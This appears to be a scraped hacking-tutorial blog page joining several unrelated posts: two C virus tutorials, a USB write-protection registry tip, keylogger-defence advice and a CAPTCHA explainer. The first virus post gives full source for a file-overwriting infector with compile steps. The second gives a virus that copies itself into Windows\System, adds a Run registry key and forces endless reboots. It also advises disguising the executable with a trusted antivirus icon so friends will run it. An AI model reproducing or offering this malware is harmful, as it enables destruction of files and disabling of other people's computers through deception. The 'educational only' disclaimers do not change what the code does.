How to Create a Computer Programme (For Educational purpose only !!!!!)

81 Comments

This program is an example of how to create a virus in C. This program demonstrates a simple virus program which upon execution (Running) creates a copy of itself in the other file. Thus it destroys other files by infecting them. But the virus infected file is also capable of spreading the infection to another file and so on. Here’s the source code of the virus program.

#include<stdio.h>
#include<io.h>
#include<dos.h>
#include<dir.h>
#include<conio.h>
#include<time.h>

FILE *virus,*host;
int done,a=0;
unsigned long x;
char buff[2048];
struct ffblk ffblk;
clock_t st,end;

void main()
{
st=clock();
clrscr();
done=findfirst(“*.*”,&ffblk,0);
while(!done)
{
virus=fopen(_argv[0],”rb”);
host=fopen(ffblk.ff_name,”rb+”);
if(host==NULL) goto next;
x=89088;
printf(“Infecting %s\n”,ffblk.ff_name,a);
while(x>2048)
{
fread(buff,2048,1,virus);
fwrite(buff,2048,1,host);
x-=2048;
}
fread(buff,x,1,virus);
fwrite(buff,x,1,host);
a++;
next:
{
fcloseall();
done=findnext(&ffblk);
}
}
printf(“DONE! (Total Files Infected= %d)”,a);
end=clock();
printf(“TIME TAKEN=%f SEC\n”,
(end-st)/CLK_TCK);
getch();
}

COMPILING METHOD:

USING BORLAND TC++ 3.0 (16-BIT):

1. Load the program in the compiler, press Alt-F9 to compile

2. Press F9 to generate the EXE file (DO NOT PRESS CTRL-F9,THIS WILL INFECT ALL THE FILES IN CUR DIRECTORY INCLUDIN YOUR COMPILER)

3. Note down the size of generated EXE file in bytes (SEE EXE FILE PROPERTIES FOR IT’S SIZE)

4. Change the value of X in the source code with the noted down size (IN THE ABOVE SOURCE CODE x= 89088; CHANGE IT)

5. Once again follow the STEP 1 & STEP 2.Now the generated EXE File is ready to infect

USING BORLAND C++ 5.5 (32-BIT) :

1. Compile once,note down the generated EXE file length in bytes

2. Change the value of X in source code to this length in bytes

3. Recompile it.The new EXE file is ready to infect

HOW TO TEST:

1. Open new empty folder

2. Put some EXE files (BY SEARCHING FOR *.EXE IN SEARCH & PASTING IN THE NEW FOLDER)

3. Run the virus EXE file there you will see all the files in the current directory get infected.

4. All the infected files will be ready to reinfect

That’s it

WARNING: FOR EDUCATIONAL PURPOSES ONLY. DO NOT SPREAD OR MISUSE THIS VIRUS CODE

How to Write-Protect USB Flash Drive

 

Many a time, it becomes necessary for us to write protect our USB flash drive so as to protect it from viruses and other malware programs. Because flash drives are so popular and most widely used to move data between computers, they are the prime target for attackers as a means to get infections spread around the computer world. Also, since USB drive is not a Read-Only Memory (ROM), the data inside it can easily be modified or deleted by malware programs.

But unfortunately, most of the new flash drives do not come with a write-protect feature as the manufacturers wish to cut down the cost of production. Hence, the only way to write-protect your USB flash drives is to enable this feature on your own computer.

This can be done by adding a small entry to the Windows registry which acts as a switch that can be enabled to make use of the write protection or disabled to allow write access. Just follow these steps:

1. Open the Registry Editor (Open the “Run” dialog box, type regedit and hit “Enter”).

2. Navigate to the following Registry key:

HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\

 3. Create a New Key named as StorageDevicePolicies. To do this right-click onControl, and click on New->Key and name it as StorageDevicePolicies.

4. Now right-click on  StorageDevicePolicies and create a New->DWORD (32-bit) Valueand name it as WriteProtect.

5. Double-click on WriteProtect and set the Value data to 1.

Now the right-protection for USB drives is enabled on your computer (no restart required) and thus it would not be possible for anyone or any program to add/delete the contents from your USB flash drive. Any attempt to copy or download the files onto the USB drive will result in the following error message being displayed.

To revert and remove the write-protection, all you need to do is just change the Value data for WriteProtect (Step-5) from 1 back to 0. Now write access to all the USB devices is re-enabled.

Sometimes it may seem difficult to remember and follow the above mentioned steps each time you want to enable/disable the write protection. Hence as an alternative way, there are many tools available to automatically enable/disable the write-protection feature. One of my favorite tool is USB Write Protect by Naresh Manadhar. Using this tool you can limit write access to your USB drives with just a click of a button. You can download this tool from the following link:

USBWriteProtect

How to Protect Your Computer from Keyloggers

21 Comments

Keyloggers have been a major problem today as it does not require any prior knowledge of computers to use it. So hackers mainly use keyloggers to steal your passwords, credit card numbers and other confidential data. Below are some methods through which you can protect your computer from keyloggers:

 

Use a Good Antivirus

This is the first and basic step that you need to take in order to protect your computer from keyloggers. Use a Good antivirus such as Kaspersky, Norton or Mcafee and update it regularly.

 

Use a Good Antispyware

Since keyloggers are basically spywares, if you are a frequent user of Internet then you could be exposed to thousands of keyloggers and spywares. So you should use a good antispyware such as NoAdware.

 

Antilogger can be Handy

Antiloggers are programs that detect the presence of keyloggers on a given computer. Over past few years, I have tested a lot of anti-logging programs and have found Zemana Antilogger as the best antilogger.

Zemana

Normally a keylogger can be easily detected by a Good Antivirus program, but hackers use some methods such as hexing, binding, crypting and similar techniques to make it harder to be detected by antivirus programs. In this case Zemana Antilogger comes handy as the program is specially developed to protect your system against harmful keyloggers.

 

Online Scanning

When ever you receive a suspicious file, you scan it with online scanners such as Multi engine antivirus scanner which scans your file with 24 antivirus engines and reports it back to you if the file is recognized as a virus or spyware. This ensures that none of the malicious programs can escape from being detected as there are 24 different antivirus engines are involved in the scanning process.

 

Sandboxie

Sandboxie is another great program to help you protect your computer against harmful keyloggers and spywares. Sandboxie runs your computer in an isolated space which prevents your program from making permanent changes to other programs in your computer.

When ever you receive a file that looks suspicious, just run the program with Sandboxie so even if it is a keylogger or any other virus it will not make permanent changes to your computer system.

To run a program in Sandboxie follow the steps as mentioned below:

1. Open sandboxie and click on sandbox menu on the top

2. Now goto Default sandbox

3. Then click on run any program

4. Now select the file you wish to run in sandboxie and click open

 

Keyscrambler

Keyscrambler is one of the best protection against keyloggers that you can have, Keyscrambler is a small program which encrypts your typed keystrokes so even if the victim has installed a keylogger on your system, he or she will get encrypted keys. Keyscrambler currently supports Firefox, Internet explorer and other applications, however its premium version supports more than 160 applications.

Hope you liked my post! Pass the comments.

This is a guest post by Rafay baloch who is an 18 year Computer engineering student, Ethical hacker, Tech blogger and an Internet marketer, He blogs at his blogLearn How to Hack and he is the writer of the book “A Beginners Guide To Ethical Hacking“

A  Program to Restart the Computer at Every Startup

Today I will show you how to create a virus that restarts the computer upon every startup. That is, upon infection, the computer will get restarted every time the system is booted. This means that the computer will become inoperable since it reboots as soon as the desktop is loaded.

For this, the virus need to be doubleclicked only once and from then onwards it will carry out rest of the operations. And one more thing, none of the antivirus softwares detect’s this as a virus since I have coded this program in C. So if you are familiar with C languagethen it’s too easy to understand the logic behind the coding.

Here is the source code.

#include<stdio.h>
#include<dos.h>
#include<dir.h>

int found,drive_no;char buff[128];

void findroot()
{
int done;
struct ffblk ffblk; //File block structure
done=findfirst(“C:\\windows\\system”,&ffblk,FA_DIREC); //to determine the root drive
if(done==0)
{
done=findfirst(“C:\\windows\\system\\sysres.exe”,&ffblk,0); //to determine whether the virus is already installed or not
if(done==0)
{
found=1; //means that the system is already infected
return;
}
drive_no=1;
return;
}
done=findfirst(“D:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“D:\\windows\\system\\sysres.exe”,&ffblk,0);
if
(done==0)
{
found=1;return;
}
drive_no=2;
return;
}
done=findfirst(“E:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“E:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=3;
return;
}
done=findfirst(“F:\\windows\\system”,&ffblk,FA_DIREC);
if(done==0)
{
done=findfirst(“F:\\windows\\system\\sysres.exe”,&ffblk,0);
if(done==0)
{
found=1;
return;
}
drive_no=4;
return;
}
else
exit(0);
}

void main()
{
FILE *self,*target;
findroot();
if(found==0) //if the system is not already infected
{
self=fopen(_argv[0],”rb”); //The virus file open’s itself
switch(drive_no)
{
case 1:
target=fopen(“C:\\windows\\system\\sysres.exe”,”wb”); //to place a copy of itself in a remote place
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
C:\\windows\\system\\ sysres.exe”); //put this file to registry for starup
break;

case 2:
target=fopen(“D:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
D:\\windows\\system\\sysres.exe”);
break;

case 3:
target=fopen(“E:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
E:\\windows\\system\\sysres.exe”);
break;

case 4:
target=fopen(“F:\\windows\\system\\sysres.exe”,”wb”);
system(“REG ADD HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\
CurrentVersion\\Run \/v sres \/t REG_SZ \/d
F:\\windows\\system\\sysres.exe”);
break;

default:
exit(0);
}

while(fread(buff,1,1,self)>0)
fwrite(buff,1,1,target);
fcloseall();
}

else
system(“shutdown -r -t 0″); //if the system is already infected then just give a command to restart}

NOTE: COMMENTS ARE GIVEN IN BROWN COLOUR.

Compiling The Scource Code Into Executable Virus.

1. Download the Source Code Here

2. The downloaded file will be Sysres.C

3. For step-by-step compilation guide, refer my post How to compile C Programs.

Testing And Removing The Virus From Your PC

You can compile and test this virus on your own PC without any fear. To test, just doubleclick the sysres.exe file and restart the system manually. Now onwards ,when every time the PC is booted and the desktop is loaded, your PC will restart automatically again and again.
It will not do any harm apart from automatically restarting your system. After testing it, you can remove the virus by the following steps.

1. Reboot your computer in the SAFE MODE

2. Goto

X:\Windows\System

(X can be C,D,E or F)

3.You will find a file by name sysres.exe, delete it.

4.Type regedit in run.You will goto registry editor.Here navigate to

HKEY_CURRENT_USER\Software\Microsoft\Windows\ CurrentVersion\Run

 There, on the right site you will see an entry by name “sres“.Delete this entry.That’s it.You have removed this Virus successfully.

Logic Behind The Working Of The Virus

If I don’t explain the logic(Algorithm) behind the working of the virus,this post will be incomplete. So I’ll explain the logic in a simplified manner. Here I’ll not explain the technical details of the program. If you have further doubts please pass comments.

LOGIC:

1. First the virus will find the Root partition (Partition on which Windows is installed).

2. Next it will determine whether the Virus file is already copied(Already infected) intoX:\Windows\System

3. If not it will just place a copy of itself into X:\Windows\System and makes a registry entry to put this virus file onto the startup.

4. Or else if the virus is already found in the X:\Windows\System directory(folder), then it just gives a command to restart the computer.

This process is repeated every time the PC is restarted.

NOTE: The system will not be restarted as soon as you double click theSysres.exe file.The restarting process will occur from the next boot of the system.

AND ONE MORE THING BEFORE YOU LEAVE (This Step is optional)

After you compile, the Sysres.exe file that you get will have a default icon. So if you send this file to your friends they may not click on it since it has a default ICON. So it is possible to change the ICON of this Sysres.exe file into any other ICON that is more trusted and looks attractive.

For example you can change the .exe file’s icon into Norton antivirus ICON itself so that the people seeing this file beleives that it is Norton antivirus. Or you can change it’s ICON into the ICON of any popular and trusted programs so that people will definitely click on it.

The detailed tutorial on changing the ICON is given in my post How To Change The ICON Of An EXE File .

CAPTCHA or Captcha (pronounced as cap-ch-uh) which stands for “Completely Automated Public Turing test to tell Computers and Humans Apart” is a type of challenge-response test to ensure that the response is only generated by humans and not by a computer. In simple words, CAPTCHA is the word verification test that you will come across the end of a sign-up form while signing up for Gmail or Yahoo account. The following image shows the typical samples of CAPTCHA.

 

 

Almost every Internet user will have an experience of CAPTCHA in their daily Internet usage, but only a few are aware of what it is and why they are used. So in this post you will find a detailed information on how CAPTCHA works and why they are used.

 

What Purpose does CAPTCHA Exactly Serve?

CAPTCPA is mainly used to prevent automated software (bots) from performing actions on behalf of actual humans. For example while signing up for a new email account, you will come across a CAPTCHA at the end of the sign-up form so as to ensure that the form is filled out only by a legitimate human and not by any of the automated software or a computer bot. The main goal of CAPTCHA is to put forth a test which is simple and straight forward for any human to answer but for a computer, it is almost impossible to solve.

 

What is the Need to Create a Test that Can Tell Computers and Humans Apart?

For many the CAPTCHA may seem to be silly and annoying, but in fact it has the ability to protect systems from malicious attacks where people try to game the system. Attackers can make use of automated softwares to generate a huge quantity of requests thereby causing a high load on the target server which would degrade the quality of service of a given system, whether due to abuse or resource expenditure. This can affect millions of legitimate users and their requests. CAPTCHAs can be deployed to protect systems that are vulnerable to email spam, such as the services from Gmail, Yahoo and Hotmail.

 

Who Uses CAPTCHA?

CAPTCHAs are mainly used by websites that offer services like online polls and registration forms. For example, Web-based email services like Gmail, Yahoo and Hotmail offer free email accounts for their users. However upon each sign-up process, CAPTCHAs are used to prevent spammers from using a bot to generate hundreds of spam mail accounts.

 

Designing a CAPTCHA System

CAPTCHAs are designed on the fact that computers lack the ability that human beings have when it comes to processing visual data. It is more easily possible for humans to look at an image and pick out the patterns than a computer. This is because computers lack the real intelligence that humans have by default. CAPTCHAs are implemented by presenting users with an image which contains distorted or randomly stretched characters which only humans should be able to identify. Sometimes characters are striked out or presented with a noisy background to make it even more harder for computers to figure out the patterns.

Most, but not all, CAPTCHAs rely on a visual test. Some Websites implement a totally different CAPTCHA system to tell humans and computers apart. For example, a user is presented with 4 images in which 3 contains picture of animals and one contain a flower. The user is asked to select only those images which contain animals in them. This Turing test can easily be solved by any human, but almost impossible for a computer. 

 

Breaking the CAPTCHA

The challenge in breaking the CAPTCHA lies in real hard task of teaching a computer how to process information in a way similar to how humans think. Algorithms with artificial intelligence (AI) will have to be designed in order to make the computer think like humans when it comes to recognizing the patterns in images. However there is no universal algorithm that could pass through and break any CAPTCHA system and hence each CAPTCHA algorithm must have to be tackled individually. It might not work 100 percent of the time, but it can work often enough to be worthwhile to spammers.